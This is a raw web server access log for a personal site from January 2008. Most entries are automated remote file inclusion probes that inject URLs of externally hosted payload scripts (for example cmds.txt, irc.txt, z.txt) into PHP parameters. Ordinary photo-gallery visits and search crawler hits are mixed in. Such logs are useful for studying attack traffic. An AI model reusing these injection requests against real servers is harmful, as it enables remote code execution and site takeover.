87.106.163.232 - - [03/Jan/2008:16:48:14 -0800] "GET /protection.php?siteurl=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.186.169.183 - - [03/Jan/2008:16:49:09 -0800] "GET /logs/access_071219.log/protection.php?siteurl=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.106.163.232 - - [03/Jan/2008:16:49:24 -0800] "GET //skin/zero_vote/error.php?dir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.218.192 - - [03/Jan/2008:16:51:57 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://cocc0z.helloweb.eu/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
62.75.218.192 - - [03/Jan/2008:16:52:03 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://cocc0z.helloweb.eu/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
161.58.198.111 - - [03/Jan/2008:16:53:14 -0800] "GET /logs/access_071224.log/skin/zero_vote/setup.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [03/Jan/2008:16:53:14 -0800] "GET /skin/zero_vote/setup.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [03/Jan/2008:16:53:14 -0800] "GET /logs/skin/zero_vote/setup.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [03/Jan/2008:16:53:25 -0800] "GET /logs/access_071224.log/skin/zero_vote/login.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [03/Jan/2008:16:53:26 -0800] "GET /skin/zero_vote/login.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [03/Jan/2008:16:53:26 -0800] "GET /logs/skin/zero_vote/login.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.186.169.183 - - [03/Jan/2008:16:54:47 -0800] "GET /logs/access_071224.log/skin/zero_vote/login.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [03/Jan/2008:16:54:47 -0800] "GET /skin/zero_vote/login.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [03/Jan/2008:16:54:47 -0800] "GET /logs/skin/zero_vote/login.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
161.58.198.111 - - [03/Jan/2008:16:54:56 -0800] "GET /logs/access_071221.log/skin/zero_vote/setup.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [03/Jan/2008:16:55:07 -0800] "GET /logs/access_071221.log/skin/zero_vote/login.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.133.237 - - [03/Jan/2008:16:55:54 -0800] "GET /modules/My_eGallery/index.php?basepath=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
72.55.133.237 - - [03/Jan/2008:16:55:54 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
208.186.169.183 - - [03/Jan/2008:16:56:08 -0800] "GET /logs/access_071224.log/skin/zero_vote/setup.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [03/Jan/2008:16:56:08 -0800] "GET /skin/zero_vote/setup.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [03/Jan/2008:16:56:08 -0800] "GET /logs/skin/zero_vote/setup.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [03/Jan/2008:16:57:10 -0800] "GET /logs/access_071221.log/skin/zero_vote/login.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [03/Jan/2008:16:58:30 -0800] "GET /logs/access_071221.log/skin/zero_vote/setup.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
12.75.21.214 - - [03/Jan/2008:16:59:15 -0800] "GET /presto/ HTTP/1.1" 200 526 "http://www.xbox.com/en-US/games/m/mystIIIexile/details.page/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
12.75.21.214 - - [03/Jan/2008:16:59:25 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
70.86.131.226 - - [03/Jan/2008:17:01:18 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
70.86.131.226 - - [03/Jan/2008:17:01:18 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
161.58.198.111 - - [03/Jan/2008:17:03:54 -0800] "GET /logs/access_071224.log/skin/zero_vote/ask_password.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [03/Jan/2008:17:03:55 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [03/Jan/2008:17:03:55 -0800] "GET /logs/skin/zero_vote/ask_password.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.204 - - [03/Jan/2008:17:04:37 -0800] "GET /logs/access_071208.log HTTP/1.0" 200 94709 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.24.145 - - [03/Jan/2008:17:05:00 -0800] "GET /presto/?S=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
161.58.198.111 - - [03/Jan/2008:17:05:33 -0800] "GET /logs/access_071221.log/skin/zero_vote/ask_password.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.163.232 - - [03/Jan/2008:17:11:21 -0800] "GET /logs/access_071224.log//skin/zero_vote/error.php?dir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [03/Jan/2008:17:11:22 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.26.36 - - [03/Jan/2008:17:12:41 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://thermair.co.uk//media/logs/Goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [03/Jan/2008:17:13:02 -0800] "GET /logs/access_071218.log//skin/zero_vote/error.php?dir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.159.20 - - [03/Jan/2008:17:19:41 -0800] "GET /logs/access_071220.log/modules/xfsection/modify.php?dir_module=http://www.auto-bmc.com/abmc/catalog/images/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.159.20 - - [03/Jan/2008:17:19:41 -0800] "GET /modules/xfsection/modify.php?dir_module=http://www.auto-bmc.com/abmc/catalog/images/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.159.20 - - [03/Jan/2008:17:19:42 -0800] "GET /logs/modules/xfsection/modify.php?dir_module=http://www.auto-bmc.com/abmc/catalog/images/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
210.245.120.9 - - [03/Jan/2008:17:20:05 -0800] "GET /logs/modules/xfsection/modify.php?dir_module=http://dvl.com.sapo.pt/www.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
210.245.120.9 - - [03/Jan/2008:17:20:05 -0800] "GET /modules/xfsection/modify.php?dir_module=http://dvl.com.sapo.pt/www.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
209.216.253.218 - - [03/Jan/2008:17:21:13 -0800] "GET /logs/access_071222.log/?mosConfig_absolute_path=http://www.skyeyesnovel.com/estore/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.253.218 - - [03/Jan/2008:17:21:14 -0800] "GET /?mosConfig_absolute_path=http://www.skyeyesnovel.com/estore/safe.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.253.218 - - [03/Jan/2008:17:21:14 -0800] "GET /logs/?mosConfig_absolute_path=http://www.skyeyesnovel.com/estore/safe.txt? HTTP/1.1" 200 29125 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.253.218 - - [03/Jan/2008:17:21:55 -0800] "GET /logs/access_071220.log/?mosConfig_absolute_path=http://www.skyeyesnovel.com/estore/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.238.195.13 - - [03/Jan/2008:17:27:24 -0800] "GET /logs//components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://intranet.stantonmortgage.com/modules/admin/lucky/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.238.195.13 - - [03/Jan/2008:17:27:24 -0800] "GET //components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://intranet.stantonmortgage.com/modules/admin/lucky/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.162.1.238 - - [03/Jan/2008:17:28:00 -0800] "GET /logs/index.php?page=http://dvl.com.sapo.pt/www.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
203.162.1.238 - - [03/Jan/2008:17:28:03 -0800] "GET /index.php?page=http://dvl.com.sapo.pt/www.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
74.6.28.79 - - [03/Jan/2008:17:30:49 -0800] "GET /presto/?S=D HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.30.179.208 - - [03/Jan/2008:17:32:32 -0800] "GET /funny/?D=A HTTP/1.0" 200 796 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.47.199.89 - - [03/Jan/2008:17:34:49 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://thermair.co.uk//media/logs/Goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.149.106.253 - - [03/Jan/2008:17:37:26 -0800] "GET /retreat1 HTTP/1.1" 301 93 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322)" "www.dmulk.com"
64.149.106.253 - - [03/Jan/2008:17:37:26 -0800] "GET /retreat1/ HTTP/1.1" 200 15081 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322)" "www.dmulk.com"
64.149.106.253 - - [03/Jan/2008:17:37:27 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322)" "www.dmulk.com"
64.149.106.253 - - [03/Jan/2008:17:37:29 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Google Desktop)" "www.dmulk.com"
64.149.106.253 - - [03/Jan/2008:17:37:42 -0800] "GET /retreat1/IMG_2670.JPG HTTP/1.1" 200 2701196 "http://www.dmulk.com/retreat1/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322)" "www.dmulk.com"
64.149.106.253 - - [03/Jan/2008:17:37:45 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Google Desktop)" "www.dmulk.com"
64.149.106.253 - - [03/Jan/2008:17:37:50 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Google Desktop)" "www.dmulk.com"
64.149.106.253 - - [03/Jan/2008:17:38:02 -0800] "GET /retreat1/IMG_2671.JPG HTTP/1.1" 200 2622382 "http://www.dmulk.com/retreat1/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322)" "www.dmulk.com"
64.149.106.253 - - [03/Jan/2008:17:38:06 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Google Desktop)" "www.dmulk.com"
64.149.106.253 - - [03/Jan/2008:17:38:06 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Google Desktop)" "www.dmulk.com"
64.149.106.253 - - [03/Jan/2008:17:38:14 -0800] "GET /retreat1/IMG_2681.JPG HTTP/1.1" 200 1970048 "http://www.dmulk.com/retreat1/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322)" "www.dmulk.com"
64.149.106.253 - - [03/Jan/2008:17:38:17 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Google Desktop)" "www.dmulk.com"
64.149.106.253 - - [03/Jan/2008:17:38:22 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Google Desktop)" "www.dmulk.com"
64.149.106.253 - - [03/Jan/2008:17:38:33 -0800] "GET /retreat1/IMG_2683.JPG HTTP/1.1" 200 2649416 "http://www.dmulk.com/retreat1/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322)" "www.dmulk.com"
64.149.106.253 - - [03/Jan/2008:17:38:37 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Google Desktop)" "www.dmulk.com"
64.149.106.253 - - [03/Jan/2008:17:38:49 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Google Desktop)" "www.dmulk.com"
64.149.106.253 - - [03/Jan/2008:17:39:02 -0800] "GET /retreat1/IMG_2687.JPG HTTP/1.1" 200 3661202 "http://www.dmulk.com/retreat1/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322)" "www.dmulk.com"
70.86.131.226 - - [03/Jan/2008:17:39:03 -0800] "GET /logs//teatro/pub/pub08_comments.php?basePath=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
70.86.131.226 - - [03/Jan/2008:17:39:04 -0800] "GET //teatro/pub/pub08_comments.php?basePath=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
64.149.106.253 - - [03/Jan/2008:17:39:05 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Google Desktop)" "www.dmulk.com"
66.55.132.6 - - [03/Jan/2008:17:39:21 -0800] "GET //teatro/pub/pub08_comments.php?basePath=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
66.55.132.6 - - [03/Jan/2008:17:39:21 -0800] "GET /logs//teatro/pub/pub08_comments.php?basePath=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
64.149.106.253 - - [03/Jan/2008:17:39:41 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Google Desktop)" "www.dmulk.com"
64.149.106.253 - - [03/Jan/2008:17:39:50 -0800] "GET /retreat1/IMG_2691.JPG HTTP/1.1" 200 2094076 "http://www.dmulk.com/retreat1/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322)" "www.dmulk.com"
64.149.106.253 - - [03/Jan/2008:17:39:52 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Google Desktop)" "www.dmulk.com"
64.149.106.253 - - [03/Jan/2008:17:39:57 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Google Desktop)" "www.dmulk.com"
64.149.106.253 - - [03/Jan/2008:17:40:09 -0800] "GET /retreat1/IMG_2697.JPG HTTP/1.1" 200 2549144 "http://www.dmulk.com/retreat1/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322)" "www.dmulk.com"
64.149.106.253 - - [03/Jan/2008:17:40:13 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Google Desktop)" "www.dmulk.com"
64.149.106.253 - - [03/Jan/2008:17:40:13 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Google Desktop)" "www.dmulk.com"
87.106.46.84 - - [03/Jan/2008:17:40:19 -0800] "GET /logs/access_071212.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://www.buysellghana.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.46.84 - - [03/Jan/2008:17:40:20 -0800] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://www.buysellghana.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.46.84 - - [03/Jan/2008:17:40:20 -0800] "GET /logs/language/lang_english/lang_main_album.php?phpbb_root_path=http://www.buysellghana.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.46.84 - - [03/Jan/2008:17:40:21 -0800] "GET /logs/access_071219.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://www.buysellghana.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.149.106.253 - - [03/Jan/2008:17:40:27 -0800] "GET /retreat1/IMG_2702.JPG HTTP/1.1" 200 2682644 "http://www.dmulk.com/retreat1/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322)" "www.dmulk.com"
64.149.106.253 - - [03/Jan/2008:17:40:29 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Google Desktop)" "www.dmulk.com"
64.149.106.253 - - [03/Jan/2008:17:40:40 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Google Desktop)" "www.dmulk.com"
64.149.106.253 - - [03/Jan/2008:17:40:50 -0800] "GET /retreat1/IMG_2705.JPG HTTP/1.1" 200 2754218 "http://www.dmulk.com/retreat1/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322)" "www.dmulk.com"
64.149.106.253 - - [03/Jan/2008:17:40:56 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Google Desktop)" "www.dmulk.com"
64.149.106.253 - - [03/Jan/2008:17:40:56 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Google Desktop)" "www.dmulk.com"
64.149.106.253 - - [03/Jan/2008:17:41:08 -0800] "GET /retreat1/IMG_2725.JPG HTTP/1.1" 200 2839528 "http://www.dmulk.com/retreat1/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322)" "www.dmulk.com"
64.149.106.253 - - [03/Jan/2008:17:41:12 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Google Desktop)" "www.dmulk.com"
87.106.163.232 - - [03/Jan/2008:17:41:15 -0800] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.149.106.253 - - [03/Jan/2008:17:41:17 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Google Desktop)" "www.dmulk.com"
64.149.106.253 - - [03/Jan/2008:17:41:26 -0800] "GET /retreat1/IMG_2717.JPG HTTP/1.1" 200 2440452 "http://www.dmulk.com/retreat1/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322)" "www.dmulk.com"
64.149.106.253 - - [03/Jan/2008:17:41:28 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Google Desktop)" "www.dmulk.com"
72.47.199.89 - - [03/Jan/2008:17:44:12 -0800] "GET /logs/access_071221.log/skin/zero_vote/ask_password.php?dir=http://thermair.co.uk//media/logs/Goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.199.89 - - [03/Jan/2008:17:44:12 -0800] "GET /logs/skin/zero_vote/ask_password.php?dir=http://thermair.co.uk//media/logs/Goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.238.22.25 - - [03/Jan/2008:17:44:17 -0800] "GET /skin/zero_vote/login.php?dir=http://thermair.co.uk//media/logs/Goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
63.238.22.25 - - [03/Jan/2008:17:44:17 -0800] "GET /skin/zero_vote/setup.php?dir=http://thermair.co.uk//media/logs/Goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
87.106.163.232 - - [03/Jan/2008:17:45:42 -0800] "GET /logs/access_071212.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [03/Jan/2008:17:45:42 -0800] "GET /logs/language/lang_english/lang_main_album.php?phpbb_root_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [03/Jan/2008:17:45:43 -0800] "GET /logs/access_071219.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.7.240.89 - - [03/Jan/2008:17:47:03 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://thermair.co.uk//media/logs/Goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.216.241.230 - - [03/Jan/2008:17:48:15 -0800] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.34.32.66 - - [03/Jan/2008:17:49:04 -0800] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.238.22.25 - - [03/Jan/2008:17:53:40 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://thermair.co.uk//media/logs/Goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
201.34.32.66 - - [03/Jan/2008:17:57:17 -0800] "GET /logs/access_071220.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.34.32.66 - - [03/Jan/2008:17:57:18 -0800] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.34.32.66 - - [03/Jan/2008:17:57:19 -0800] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.216.241.230 - - [03/Jan/2008:17:57:32 -0800] "GET /logs/access_071220.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.216.241.230 - - [03/Jan/2008:17:57:32 -0800] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.216.241.230 - - [03/Jan/2008:17:57:32 -0800] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.238.22.25 - - [03/Jan/2008:17:58:18 -0800] "GET /logs/access_071221.log/skin/zero_vote/login.php?dir=http://thermair.co.uk//media/logs/Goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
63.238.22.25 - - [03/Jan/2008:17:58:18 -0800] "GET /logs/skin/zero_vote/login.php?dir=http://thermair.co.uk//media/logs/Goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
